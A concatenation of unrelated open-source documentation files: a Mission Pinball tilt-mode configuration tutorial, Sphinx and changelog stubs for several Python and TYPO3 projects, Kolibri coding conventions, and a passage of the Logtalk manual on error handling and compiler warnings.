*<your_machine>/modes/tilt/config/tilt.yaml*. Since this file is
totally blank, add the required ` *#config_version=3*`_ to the top
line. Next, add a section called *tilt:*, and then under there, indent
a few spaces (it doesn't matter how many, 2 or 4 or whatever you
prefer) and add a section called *categories:*. Your *tilt.yaml* file
should now look like this:
::
#config_version=3
tilt:
Next you need to add the settings for the tilt behavior in your
machine. Here's a sample you can use as a starting point:
::
tilt:
tilt_warning_switch_tag: tilt_warning
tilt_switch_tag: tilt
slam_tilt_switch_tag: slam_tilt
warnings_to_tilt: 3
reset_warnings_events: ball_ended
multiple_hit_window: 300ms
settle_time: 5s
tilt_warnings_player_var: tilt_warnings
Full details of what each of these settings does is outlined in the `
*tilt:* section`_ of the configuration file reference, so check that
out for details on anything not covered here. It's all fairly self-
explanatory. First, notice that the switches to activate the *tilt*,
*tilt warning*, and *slam tilt* are controlled by switch tags rather
than by switch names themselves. (We'll add those in the next step.)
*Warnings_to_tilt* is how many warning switch activations lead to a
tilt. The default value of 3 means that the player will have 2
warnings, since on the third activation the tilt will occur. The
*multiple_hit_window* means that multiple tilt warning events within
this time window will only count as a single warning. This is a non-
sliding window, meaning that if the window is 300ms and a tilt warning
comes in at 0 (the first one), then 250ms after that, then 60ms after
that—that will actually count as 2 warnings. (The second hit at 250ms
is within the 300ms window, but the third hit 60ms later is actually
310ms after the first one which started the window, so it counts.) The
*settle_time* is the amount of time that must pass after the last
warning before the tilt will be cleared and the next ball can start.
This is to prevent the situation where a player tilts in an aggressive
way and the plumb bob is bouncing around so much that it causes the
next player's ball to tilt too. So when a tilt occurs, if a ball
drains before the *settle_time* is up, MPF will hold the machine in
the tilt state until it settles, then proceed on to the next player
and/or the next ball. The *reset_warnings_events* is the event in MPF
that resets the tilt warnings to 0. The sample config from above means
that the tilt warnings are reset when the ball ends. In other words
with a *warnings_to_tilt* of 3, the player gets three warnings per
ball. If you want to make the warnings carry over from ball-to-ball,
you could change the *reset_warnings_events* to *game_ended*.
(C) Add switch tags
-------------------
Since the tilt mode uses switch tags instead of switch names, you need
to go into your machine-wide configuration and add the tags to the
various switches you want to do tilt-related things. In most modern
games, you'll just use the tilt_warning and slam_tilt tags, like this
(from your machine-wide config):
::
switches:
s_plumb_bob:
number: s14
label:
tags: tilt
s_slam_tilt:
number: s21
label:
tags: slam_tilt
(D) Add the tilt mode to your list of modes
-------------------------------------------
Now that you have the tilt settings configured, you can add the tilt
mode to the list of modes that are used in your machine. To do this,
add `- tilt` to the *modes:* section in your machine-wide config, like
this:
::
modes:
- base
- some_existing_mode
- another_mode_you_might_have
- credits
- bonus
- tilt
The order doesn’t matter here since the priority each mode runs at is
configured in its own mode configuration file. All you’re doing now is
configuring the tilt mode as a mode that your machine will use. You
might be wondering why your new *tilt.yaml* mode configuration file
doesn't have a *mode:* section? That's because the *tilt* mode is
built-in to MPF (in the *mpf/modes/tilt*) folder, so when you add a
*tilt* folder to your own machine's modes folder, MPF merges together
the settings from the MPF modes folder and your modes folder. (It
loads the MPF mode config first with baseline settings, and then it
merges in your machine's mode config which can override them.) If you
look at the built-in *tilt* mode's config (at
*mpf/modes/tilt/config/tilt.yaml*), you'll see it has the following
*mode:* section:
::
mode:
code: tilt.Tilt
priority: 10000
start_events: machine_reset_phase_3
stop_on_ball_end: False
First is that the priority of this mode is really high, 10000 by
default. That's because we want this mode to run "on top" of any other
mode so any slides it puts on the display (like the tilt warnings) are
displayed on top of the slides from any other mode that might be
running. Also note that the tilt mode starts when the
*machine_reset_phase_3* event is posted (which is done as part of the
MPF startup process), and that there are no stop events. Basically we
want the tilt mode to start and never stop. (We even want it to run
during attract mode so it can look for slam tilts.)
(E) Add slides and lighting effects
-----------------------------------
There are several events posted by the tilt mode, including:
+ * tilt_warning * – a switch with the tilt warning tag was activated
outside of the multiple hit window, and the player’s tilt warnings has
just increased.
+ * tilt_warning_<x> * – Same as tilt warning, but the “x” is the
number of the warning. This lets you put different slides on the
display for tilt_warning_1 versus tilt_warning_2, etc.
+ * tilt * – The machine has tilted.
+ * tilt_clear * – The tilt is cleared, meaning all the balls have
drained and the settle_time has passed.
+ * slam_tilt * – The machine has slam tilted.
You can use this events to tell the player what's going on. For
example, the configuration from the tilt mode template includes the
following:
::
slide_player:
tilt_warning_1:
type: text
text: WARNING
expire: 1s
tilt_warning_2:
- type: text
text: WARNING
y: 2
- type: text
text: WARNING
y: 18
expire: 1s
tilt:
type: text
text: TILT
tilt_clear:
clear_slides: yes
These slide player settings put a slide that says *WARNING* on the
display for 1 second on the first warning, and a slide that says
*WARNING WARNING* for the second warning. They also display a slide
that says *TILT* when the player tilts. Also note the *tilt_clear:*
entry which clears out all the slides from the tilt mode when the tilt
clears. Since the tilt mode is running at priority 10,000, these
slides should play on top of any other slides from other active modes.
You can change the fonts, placement, text, etc. of these slides or add
other display elements as you see fit. You could also add
*sound_player* or *light_player* sections if you wanted to plays
sounds or blink all the playfield lights. (To blink the playfield
lights, create a light show with 1 step that turns off all the lights
for a half-second or so.)
(F) Check out this complete tilt config file
--------------------------------------------
Here's the complete tilt config file from the Demo Man sample game. (
*demo_man/modes/tilt/config/tilt.yaml*):
::
#config_version=3
tilt:
tilt_warning_switch_tag: tilt_warning
tilt_switch_tag: tilt
slam_tilt_switch_tag: slam_tilt
warnings_to_tilt: 3
reset_warnings_events: ball_ended
multiple_hit_window: 300ms
settle_time: 5s
tilt_warnings_player_var: tilt_warnings
slide_player:
tilt_warning_1:
type: text
text: WARNING
expire: 1s
tilt_warning_2:
- type: text
text: WARNING
y: 2
- type: text
text: WARNING
y: 18
expire: 1s
tilt:
type: text
text: TILT
tilt_clear:
clear_slides: yes
.. _#config_version=3: https://missionpinball.com/docs/configuration-file-reference/important-config-file-concepts/config_version/
.. _ section: https://missionpinball.com/docs/configuration-file-reference/tilt/
| 33.584158 | 130 | 0.712952 |
5912573190cd814e7aa3c7244240a153a33c756f | 589 | rst | reStructuredText | doc/Changelog/9.1/Feature-61170-AddAdditionalHookForRecordList.rst | DanielSiepmann/typo3scan | 630efc8ea9c7bd86c4b9192c91b795fff5d3b8dc | [
"MIT"
] | 1 | 2019-10-04T23:58:04.000Z | 2019-10-04T23:58:04.000Z | doc/Changelog/9.1/Feature-61170-AddAdditionalHookForRecordList.rst | DanielSiepmann/typo3scan | 630efc8ea9c7bd86c4b9192c91b795fff5d3b8dc | [
"MIT"
] | 1 | 2021-12-17T10:58:59.000Z | 2021-12-17T10:58:59.000Z | doc/Changelog/9.1/Feature-61170-AddAdditionalHookForRecordList.rst | DanielSiepmann/typo3scan | 630efc8ea9c7bd86c4b9192c91b795fff5d3b8dc | [
"MIT"
] | 4 | 2020-10-06T08:18:55.000Z | 2022-03-17T11:14:09.000Z | .. include:: ../../Includes.txt
=====================================================
Feature: #61170 - Add additional hook for record list
=====================================================
See :issue:`61170`
Description
===========
An additional hook has been added to `EXT:recordlist` to render content above any other content.
Example of usage
.. code-block:: php
$GLOBALS['TYPO3_CONF_VARS']['SC_OPTIONS']['recordlist/Modules/Recordlist/index.php']['drawHeaderHook']['extkey'] = \Vendor\Extkey\Hooks\PageHook::class . '->render';
.. index:: Backend, LocalConfiguration
| 26.772727 | 169 | 0.578947 |
babec81359460b7ac253e93f55d41576242b09cf | 68 | rst | reStructuredText | workloads/pytorch/recommendation/docs/source/recoder.rst | akshayka/gavel | 40a22a725f2e70478483e98c9b07c6fc588e0c40 | [
"MIT"
] | 67 | 2020-09-07T11:50:03.000Z | 2022-03-31T04:09:08.000Z | docs/source/recoder.rst | delldu/recoder | 6ab51fc5710119854cc0e9f7f3c5fcdbf80204b2 | [
"MIT"
] | 7 | 2020-09-27T01:41:59.000Z | 2022-03-25T05:16:43.000Z | docs/source/recoder.rst | delldu/recoder | 6ab51fc5710119854cc0e9f7f3c5fcdbf80204b2 | [
"MIT"
] | 12 | 2020-10-13T14:31:01.000Z | 2022-02-14T05:44:38.000Z | Recoder
*******
.. autoclass:: recoder.model.Recoder
:members:
| 11.333333 | 36 | 0.617647 |
3c837e79a869c5999633437393c473bd27a3f6ad | 177 | rst | reStructuredText | docs/transports/mtn_nigeria.rst | seidu626/vumi | 62eae205a07029bc7ab382086715694548001876 | [
"BSD-3-Clause"
] | 199 | 2015-01-05T09:04:24.000Z | 2018-08-15T17:02:49.000Z | docs/transports/mtn_nigeria.rst | seidu626/vumi | 62eae205a07029bc7ab382086715694548001876 | [
"BSD-3-Clause"
] | 187 | 2015-01-06T15:22:38.000Z | 2018-07-14T13:15:29.000Z | docs/transports/mtn_nigeria.rst | seidu626/vumi | 62eae205a07029bc7ab382086715694548001876 | [
"BSD-3-Clause"
] | 86 | 2015-01-31T02:47:08.000Z | 2018-12-01T11:59:47.000Z | MTN Nigeria
===========
MTN Nigeria USSD Transport
^^^^^^^^^^^^^^^^^^^^^^^^^^
.. automodule:: vumi.transports.mtn_nigeria.mtn_nigeria_ussd
:members:
:show-inheritance:
| 16.090909 | 60 | 0.59887 |
bbd4060d34698621095d8bcf60d62053946669a6 | 141 | rst | reStructuredText | docs/changes/modeling/12558.feature.rst | emirkmo/astropy | d96cd45b25ae55117d1bcc9c40e83a82037fc815 | [
"BSD-3-Clause"
] | 1 | 2019-03-11T12:26:49.000Z | 2019-03-11T12:26:49.000Z | docs/changes/modeling/12558.feature.rst | emirkmo/astropy | d96cd45b25ae55117d1bcc9c40e83a82037fc815 | [
"BSD-3-Clause"
] | 1 | 2019-10-09T18:54:27.000Z | 2019-10-09T18:54:27.000Z | docs/changes/modeling/12558.feature.rst | emirkmo/astropy | d96cd45b25ae55117d1bcc9c40e83a82037fc815 | [
"BSD-3-Clause"
] | null | null | null | Switch ``modeling.projections`` to use ``astropy.wcs.Prjprm`` wrapper internally and provide access to the ``astropy.wcs.Prjprm`` structure.
| 70.5 | 140 | 0.77305 |
4242fbff183b47a9c95a77dfe7390cc017123611 | 3,058 | rst | reStructuredText | docs/dev/conventions.rst | dylanmccall/kolibri | 34a0fac0920106524092937b8a44ef07701e9fd6 | [
"MIT"
] | 1 | 2021-11-09T11:30:12.000Z | 2021-11-09T11:30:12.000Z | docs/dev/conventions.rst | dylanmccall/kolibri | 34a0fac0920106524092937b8a44ef07701e9fd6 | [
"MIT"
] | 1 | 2016-09-13T19:02:03.000Z | 2016-09-21T17:21:07.000Z | docs/dev/conventions.rst | dylanmccall/kolibri | 34a0fac0920106524092937b8a44ef07701e9fd6 | [
"MIT"
] | 1 | 2020-05-21T18:17:55.000Z | 2020-05-21T18:17:55.000Z | Project Conventions
===================
*TODO*
Documentation
-------------
*reStructuredText, docstrings, requirements for PRs to master...*
Git Workflow
------------
*stable master, develop, feature branches, tags, releases, hot fixes, internal vs external repos...*
Python Code
-----------
*PEP8, additional conventions and best practices...*
Vue.js Components
-----------------
Note that the top-level tags of `Vue.js components <https://vuejs.org/guide/components.html>`_ are ``<template>``, ``<script>``, and ``<style>``.
- Whitespace
- an indent is 2 spaces
- two blank lines between top-level tags
- one blank line of padding within a top-level tag
- one level of indent for the contents of all top-level tags
- Keep most child-components stateless. In practice, this means using ``props`` but not ``data``.
- Avoid using Vue.js' camelCase-to-kebab-case mapping. Instead, use square brackets and strings to reference names.
- Use ``scoped`` styles where ever possible
- Name custom tags using kebab-case
- Components are placed in the *vue* directory. The root component file is called *vue/index.vue*, and is mounted on a tag called ``<rootvue>``.
- Components are defined either as a file with a ``.vue`` extension (*my-component.vue*) or as a directory with an *index.vue* file (*my-component/index.vue*). Both forms can be used with ``require('my-component')``.
- Put child components inside the directory of a parent component if they are *only* used by the parent. Otherwise, put shared child components in the *vue* director.
- Any user visisble interface text should be rendered translatable, this can be done by supplementing the Vue.js component definition with the following properties:
- ``$trs``, an object of the form::
{
msgId: 'Message text',
}
- ``$trNameSpace``, a string that namespaces the messages.
- User visible strings should then either be rendered directly in the template with ``{{ $tr('msgId') }}`` or can be made available through computed properties (note, if you want to pass rendered strings into tag/component properties, this will be necessary as Vue.js does not evaluate Javascript expressions in these cases).
JavaScript Code
---------------
- We use the `AirBnB Javascript Style guide <https://github.com/airbnb/javascript>`_ for client-side ES6 code in Vue components.
- ``use strict`` is automatically inserted.
- Use CommonJS-style ``require`` and ``module.exports`` statements, not ES6 ``import``/``export`` statements.
- For logging statements we use a thin wrapper around the ``log-level`` JS library, that prefixes the log statements with information about the logging level and current file. To access the logger, simply include the following code snippet:
.. code-block:: javascript
const logging = require('logging').getLogger(__filename);
Stylus and CSS
--------------
- clear out unused styles
- avoid using classes as JS identifiers, and prefix with ``js-`` if necessary
HTML
----
*attribute lists, semantic structure, accessibility...*
| 35.55814 | 325 | 0.7155 |
a090bb11a0d522815a57de7a39d48433ea683b21 | 1,144 | rst | reStructuredText | doc/plotting.rst | p-glaum/PyPSA | a8cfdf1acd9b348828474ad0899afe2c77818159 | [
"MIT"
] | null | null | null | doc/plotting.rst | p-glaum/PyPSA | a8cfdf1acd9b348828474ad0899afe2c77818159 | [
"MIT"
] | null | null | null | doc/plotting.rst | p-glaum/PyPSA | a8cfdf1acd9b348828474ad0899afe2c77818159 | [
"MIT"
] | null | null | null | ######################
Plotting Networks
######################
See the module ``pypsa.plot``.
PyPSA has several functions available for plotting networks with
different colors/widths/labels on buses and branches.
Static plotting with matplotlib
===============================
Static plots of networks can be created that use the library
`matplotlib <https://matplotlib.org/>`_. This is meant for use with
`Jupyter notebooks <https://jupyter.org/>`_, but can also be used to
generate image files.
To plot a network with matplotlib run
``network.plot()``, see :py:meth:`pypsa.Network.plot` for details.
See also the `SciGRID matplotlib example
<https://pypsa.readthedocs.io/en/latest/examples/scigrid-lopf-then-pf.html>`_.
Interactive plotting with plotly
================================
Interactive plots of networks can be created that use the `d3js
<https://d3js.org/>`_-based library `plotly
<https://plot.ly/python/>`_ (this uses JavaScript and SVGs). This is
meant for use with `Jupyter notebooks <https://jupyter.org/>`_.
To plot a network with plotly run
``network.iplot()``, see :py:meth:`pypsa.Network.iplot` for details.
| 33.647059 | 78 | 0.689685 |
92530e625a655ebc7fe968628a4bd8c0a0b75614 | 1,471 | rst | reStructuredText | docs/source/torchnet.dataset.rst | HarshTrivedi/tnt | 4bd49afaa936e888ea1020a4f9ef54613beea559 | [
"BSD-3-Clause"
] | 1,463 | 2017-01-18T22:59:37.000Z | 2022-03-31T01:58:02.000Z | docs/source/torchnet.dataset.rst | HarshTrivedi/tnt | 4bd49afaa936e888ea1020a4f9ef54613beea559 | [
"BSD-3-Clause"
] | 105 | 2017-01-18T20:30:01.000Z | 2021-12-31T15:08:18.000Z | docs/source/torchnet.dataset.rst | HarshTrivedi/tnt | 4bd49afaa936e888ea1020a4f9ef54613beea559 | [
"BSD-3-Clause"
] | 236 | 2017-01-18T20:17:32.000Z | 2022-02-16T06:41:40.000Z | .. role:: hidden
:class: hidden-section
torchnet.dataset
========================
.. automodule:: torchnet.dataset
.. currentmodule:: torchnet.dataset
Provides a :class:`Dataset` interface, similar to vanilla PyTorch.
.. autoclass:: torchnet.dataset.dataset.Dataset
:members:
:undoc-members:
:show-inheritance:
:hidden:`BatchDataset`
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.. autoclass:: BatchDataset
:members:
:show-inheritance:
:hidden:`ConcatDataset`
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.. autoclass:: ConcatDataset
:members:
:undoc-members:
:show-inheritance:
:hidden:`ListDataset`
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.. autoclass:: ListDataset
:members:
:undoc-members:
:show-inheritance:
:hidden:`ResampleDataset`
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.. autoclass:: ResampleDataset
:members:
:undoc-members:
:show-inheritance:
:hidden:`ShuffleDataset`
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.. autoclass:: ShuffleDataset
:members:
:undoc-members:
:show-inheritance:
:hidden:`SplitDataset`
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.. autoclass:: SplitDataset
:members:
:undoc-members:
:show-inheritance:
:hidden:`TensorDataset`
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.. autoclass:: TensorDataset
:members:
:undoc-members:
:show-inheritance:
:hidden:`TransformDataset`
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.. autoclass:: TransformDataset
:members:
:undoc-members:
:show-inheritance:
| 19.613333 | 66 | 0.552685 |
f604fffa4a2472b73f7ff921376d527853d33c21 | 240 | rst | reStructuredText | modules/photons_canvas/font/README.rst | Djelibeybi/photons | bc0aa91771d8e88fd3c691fb58f18cb876f292ec | [
"MIT"
] | 51 | 2020-07-03T08:34:48.000Z | 2022-03-16T10:56:08.000Z | modules/photons_canvas/font/README.rst | delfick/photons | bc0aa91771d8e88fd3c691fb58f18cb876f292ec | [
"MIT"
] | 81 | 2020-07-03T08:13:59.000Z | 2022-03-31T23:02:54.000Z | modules/photons_canvas/font/README.rst | Djelibeybi/photons | bc0aa91771d8e88fd3c691fb58f18cb876f292ec | [
"MIT"
] | 8 | 2020-07-24T23:48:20.000Z | 2021-05-24T17:20:16.000Z | Making the alphabet fonts
=========================
The alphabet fonts are made using the font from
https://fontstruct.com/fontstructions/show/25590/amstrad_cpc_extended
And converted using the ``_generate_alphabet.py`` in this directory
| 30 | 69 | 0.7375 |
126f87202d709a6f0e6f9b558f384ca0a9a13092 | 1,866 | rst | reStructuredText | README.rst | cjrh/perflog | 0122d66070a634a48978acf5eaed0f2cfcdb866e | [
"Apache-2.0"
] | null | null | null | README.rst | cjrh/perflog | 0122d66070a634a48978acf5eaed0f2cfcdb866e | [
"Apache-2.0"
] | 2 | 2017-08-08T05:48:29.000Z | 2017-08-08T05:48:49.000Z | README.rst | cjrh/perflog | 0122d66070a634a48978acf5eaed0f2cfcdb866e | [
"Apache-2.0"
] | null | null | null | .. image:: https://travis-ci.org/cjrh/perflog.svg?branch=master
:target: https://travis-ci.org/cjrh/perflog
.. image:: https://coveralls.io/repos/github/cjrh/perflog/badge.svg?branch=master
:target: https://coveralls.io/github/cjrh/perflog?branch=master
.. image:: https://img.shields.io/pypi/pyversions/perflog.svg
:target: https://pypi.python.org/pypi/perflog
.. image:: https://img.shields.io/github/tag/cjrh/perflog.svg
:target: https://img.shields.io/github/tag/cjrh/perflog.svg
.. image:: https://img.shields.io/badge/install-pip%20install%20perflog-ff69b4.svg
:target: https://img.shields.io/badge/install-pip%20install%20perflog-ff69b4.svg
.. image:: https://img.shields.io/pypi/v/perflog.svg
:target: https://img.shields.io/pypi/v/perflog.svg
perflog
=======
**Structured logging support for application performance and monitoring data**
Demo
----
.. code:: python
""" My Application """
import perflog
def main():
<All the usual application code goes here>
if __name__ == '__main__':
perflog.set_and_forget()
main()
There are several parameters for the ``set_and_forget`` method that can be
used to change the default behaviour. For example, by default the performance
log messages will be written every 60 seconds.
Note: in addition to writing performance data to the log message itself,
``perflog`` also adds *extra logrecord fields*. This means that if you're
using a log formatter that writes out all the fields in some kind of
structured format (say, logstash_formatter), you will find that the performance
data will also be recorded in those fields and can therefore be accessed in
tools like Kibana.
Acknowledgements
----------------
``perflog`` uses `psutil <https://github.com/giampaolo/psutil>`_ to
obtain all the process-related information. Thanks Giampaolo!
| 31.627119 | 84 | 0.72776 |
2d028bf04bb693f45241d5da63108a8337455894 | 219 | rst | reStructuredText | docs/glasses.models.segmentation.base.rst | rentainhe/glasses | 34300a76985c7fc643094fa8d617114926a0ee75 | [
"MIT"
] | 271 | 2020-10-20T12:30:23.000Z | 2022-03-17T03:02:38.000Z | docs/glasses.models.segmentation.base.rst | rentainhe/glasses | 34300a76985c7fc643094fa8d617114926a0ee75 | [
"MIT"
] | 212 | 2020-07-25T13:02:23.000Z | 2022-02-20T10:33:32.000Z | docs/glasses.models.segmentation.base.rst | rentainhe/glasses | 34300a76985c7fc643094fa8d617114926a0ee75 | [
"MIT"
] | 23 | 2021-01-03T13:53:36.000Z | 2022-03-17T05:40:34.000Z | glasses.models.segmentation.base package
========================================
Module contents
---------------
.. automodule:: glasses.models.segmentation.base
:members:
:undoc-members:
:show-inheritance:
| 19.909091 | 48 | 0.561644 |
f9f22eaf66dd844840eefdff20977a4fb03e6ae3 | 1,011 | rst | reStructuredText | docs/source/index.rst | aatrubilin/trassir_script_framework | 2a850a974688b2c357692265bacfe82c233b825f | [
"MIT"
] | 8 | 2019-08-17T09:14:22.000Z | 2021-12-31T09:30:35.000Z | docs/source/index.rst | aatrubilin/trassir_script_framework | 2a850a974688b2c357692265bacfe82c233b825f | [
"MIT"
] | 1 | 2019-04-30T00:34:15.000Z | 2019-04-30T00:34:15.000Z | docs/source/index.rst | AATrubilin/trassir_script_framework | 2a850a974688b2c357692265bacfe82c233b825f | [
"MIT"
] | 5 | 2019-09-18T14:29:30.000Z | 2021-12-31T09:30:41.000Z | .. Trassir Script Framework documentation master file, created by
sphinx-quickstart on Mon Apr 1 14:38:36 2019.
You can adapt this file completely to your liking, but it should at least
contain the root `toctree` directive.
Trassir Script Framework's documentation!
====================================================
| *Фреймворк для скриптов автоматизации Trassir.*
| *Для использования фреймворка скопируйте* `исходный код
<https://github.com/AATrubilin/trassir_script_framework/blob/master/trassir_script_framework.py>`_
*в свой скрипт*
| Примеры использования фреймворка доступны по `ссылке
<https://github.com/AATrubilin/trassir_script_framework/tree/master/examples>`_
| Дополнительная информация о скриптах доступна в `документации
<https://www.dssl.ru/files/trassir/manual/ru/setup-script-feature.html>`_
.. toctree::
script_framework
Changelog
=========
.. toctree::
:maxdepth: 2
changelog
Indices and tables
==================
* :ref:`genindex`
* :ref:`search`
| 27.324324 | 100 | 0.706231 |
1a03be2ac9c8de9f2576ef8f6b8e1fe5accff87f | 13,354 | rst | reStructuredText | manuals/sources/userman/errors.rst | aarroyoc/logtalk3 | c737a00f0293cfc1fdd85e5b704a6d2524b6d29a | [
"Apache-2.0"
] | null | null | null | manuals/sources/userman/errors.rst | aarroyoc/logtalk3 | c737a00f0293cfc1fdd85e5b704a6d2524b6d29a | [
"Apache-2.0"
] | null | null | null | manuals/sources/userman/errors.rst | aarroyoc/logtalk3 | c737a00f0293cfc1fdd85e5b704a6d2524b6d29a | [
"Apache-2.0"
] | null | null | null | ..
This file is part of Logtalk <https://logtalk.org/>
Copyright 1998-2022 Paulo Moura <pmoura@logtalk.org>
SPDX-License-Identifier: Apache-2.0
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
.. _errors_errors:
Error handling
==============
Error handling is accomplished in Logtalk by using the standard ``catch/3``
and ``throw/1`` predicates [ISO95]_ together with a set of built-in methods
that simplify generating errors decorated with expected context.
Errors thrown by Logtalk have, whenever possible, the following format:
::
error(Error, logtalk(Goal, ExecutionContext))
In this exception term, ``Goal`` is the goal that triggered the error
``Error`` and ``ExecutionContext`` is the context in which ``Goal`` is
called. For example:
::
error(
permission_error(modify,private_predicate,p),
logtalk(foo::abolish(p/0), _)
)
Note, however, that ``Goal`` and ``ExecutionContext`` can be unbound or only
partially instantiated when the corresponding information is not available
(e.g. due to compiler optimizations that throw away the necessary error context
information). The ``ExecutionContext`` argument is an opaque term that
can be decoded using the
:ref:`logtalk::execution_context/7 <logtalk/0::execution_context/7>` predicate.
Raising Exceptions
------------------
The :ref:`error handling section <error_handling_methods>` in the reference
manual lists a set of convenient built-in methods that generate ``error/2``
exception terms with the expected context argument. For example, instead of
manually constructing a type error as in:
::
...,
context(Context),
throw(error(type_error(atom, 42), Context)).
we can simply write:
::
...,
type_error(atom, 42).
The provided error built-in methods cover all standard error types found in
the ISO Prolog Core standard.
Type-checking
-------------
One of the most common case where errors may be generated is when
type-checking predicate arguments and input data before processing it.
The standard library includes a :ref:`type <apis:type/0>` object that
defines an extensive set of types, together with predicates for validating
and checking terms. The set of types is user extensible and new types can
be defined by adding clauses for the ``type/1`` and ``check/2`` multifile
predicates. For example, assume that we want to be able to check
*temperatures* expressed in Celsius, Fahrenheit, or Kelvin scales. We
start by declaring (in an object or category) the new type:
::
:- multifile(type::type/1).
type::type(temperature(_Unit)).
Next, we need to define the actual code that would verify that a temperature
is valid. As the different scales use a different value for absolute zero,
we can write:
::
:- multifile(type::check/2).
type::check(temperature(Unit), Term) :-
check_temperature(Unit, Term).
% given that temperature has only a lower bound, we make use of the library
% property/2 type to define the necessary test expression for each unit
check_temperature(celsius, Term) :-
type::check(property(float, [Temperature]>>(Temperature >= -273.15)), Term).
check_temperature(fahrenheit, Term) :-
type::check(property(float, [Temperature]>>(Temperature >= -459.67)), Term).
check_temperature(kelvin, Term) :-
type::check(property(float, [Temperature]>>(Temperature >= 0.0)), Term).
With this definition, a term is first checked that it is a float value before
checking that it is in the expected open interval. But how do we use this new
type? If we want just to test if a temperature is valid, we can write:
::
..., type::valid(temperature(celsius), 42.0), ...
The :ref:`type::valid/2 <apis:type/0::valid/2>` predicate succeeds or fails
depending on the second argument being of the type specified in the first
argument. If instead of success or failure we want to generate an error for
invalid values, we can use the :ref:`type::check/2 <apis:type/0::check/2>`
predicate instead:
::
..., type::check(temperature(celsius), 42.0), ...
If we require an ``error/2`` exception term with the error context, we can
use instead the :ref:`type::check/3 <apis:type/0::check/3>` predicate:
::
...,
context(Context),
type::check(temperature(celsius), 42.0, Context),
...
Note that ``context/1`` calls are inlined and messages to the library
``type`` object use :term:`static binding` when compiling with the
:ref:`optimize flag <flag_optimize>` turned on, thus enabling efficient
type-checking.
Expected terms
--------------
Support for representing and handling *expected terms* is provided by the
:doc:`../libraries/expecteds` library. Expected terms allows defering errors
to later stages of an application in alternative to raising an exception as
soon as an error is detected.
Compiler warnings and errors
----------------------------
The current Logtalk compiler uses the standard ``read_term/3`` built-in
predicate to read and compile a Logtalk source file. This improves the
compatibility with :term:`backend Prolog compilers <backend Prolog compiler>`
and their proprietary syntax extensions and standard compliance quirks. But one
consequence of this design choice is that invalid Prolog terms or syntax errors
may abort the compilation process with limited information given to the user
(due to the inherent limitations of the ``read_term/3`` predicate).
Assuming that all the terms in a source file are valid, there is a set of
errors and potential errors, described below, that the compiler will try
to detect and report, depending on the used compiler flags (see the
:ref:`programming_flags` section of this manual on lint flags for details).
.. _errors_unknown:
Unknown entities
~~~~~~~~~~~~~~~~
The Logtalk compiler warns about any referenced entity that is not
currently loaded. The warning may reveal a misspell entity name or just
an entity that it will be loaded later. Out-of-oder loading should be
avoided when possible as it prevents some code optimizations such as
:term:`static binding` of messages to methods.
.. _errors_singletons:
Singleton variables
~~~~~~~~~~~~~~~~~~~
Singleton variables in a clause are often misspell variables and, as
such, one of the most common errors when programming in Prolog.
Assuming that the :term:`backend Prolog compiler` implementation of the
``read_term/3`` predicate supports the standard ``singletons/1``
option, the compiler warns about any singleton variable found while
compiling a source file.
.. _errors_prolog:
Redefinition of Prolog built-in predicates
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The Logtalk compiler will warn us of any redefinition of a Prolog
built-in predicate inside an object or category. Sometimes the redefinition
is intended. In other cases, the user may not be aware that a particular
:term:`backend Prolog compiler` may already provide the predicate
as a built-in predicate or may want to ensure code portability among
several Prolog compilers with different sets of built-in predicates.
.. _errors_redefinition_predicates:
Redefinition of Logtalk built-in predicates
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Similar to the redefinition of Prolog built-in predicates, the Logtalk
compiler will warn us if we try to redefine a Logtalk built-in. But the
redefinition will probably be an error in most (if not all) cases.
.. _errors_redefinition_methods:
Redefinition of Logtalk built-in methods
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
An error will be thrown if we attempt to redefine a Logtalk built-in
method inside an entity. The default behavior is to report the error and
abort the compilation of the offending entity.
.. _errors_misspell:
Misspell calls of local predicates
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A warning will be reported if Logtalk finds (in the body of a predicate
definition) a call to a local predicate that is not defined, built-in
(either in Prolog or in Logtalk) or declared dynamic. In most cases
these calls are simple misspell errors.
.. _errors_portability:
Portability warnings
~~~~~~~~~~~~~~~~~~~~
A warning will be reported if a predicate clause contains a call to a
non-standard built-in predicate or arithmetic function, Portability
warnings are also reported for non-standard flags or flag values. These
warnings often cannot be avoided due to the limited scope of the ISO
Prolog standard.
.. _errors_deprecated:
Deprecated elements
~~~~~~~~~~~~~~~~~~~
A warning will be reported if a deprecated directive, control construct,
or predicate is used. These warnings should be fixed as soon as possible
as support for any deprecated features will likely be discontinued in
future versions.
.. _errors_missing_directives:
Missing directives
~~~~~~~~~~~~~~~~~~
A warning will be reported for any missing dynamic, discontiguous,
meta-predicate, and public predicate directive.
.. _errors_duplicated_directives:
Duplicated directives
~~~~~~~~~~~~~~~~~~~~~
A warning will be reported for any duplicated scope, multifile, dynamic,
discontiguous, meta-predicate, and meta-non-terminal directives. Note
that conflicting directives for the same predicate are handled as
errors, not as duplicated directive warnings.
.. _errors_duplicated_clauses:
Duplicated clauses
~~~~~~~~~~~~~~~~~~
A warning will be reported for any duplicated entity clauses. This check
is computationally heavy, however, and usually turned off by default.
.. _errors_always_true_or_false_goals:
Goals that are always true or false
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A warning will be reported for any goal that is always true or false.
This is usually caused by typos in the code. For example, writing
``X == y`` instead of ``X == Y``.
.. _errors_trivial_fails:
Trivial fails
~~~~~~~~~~~~~
A warning will be reported for any call to a local static predicate with
no matching clause.
.. _errors_suspicious_calls:
Suspicious calls
~~~~~~~~~~~~~~~~
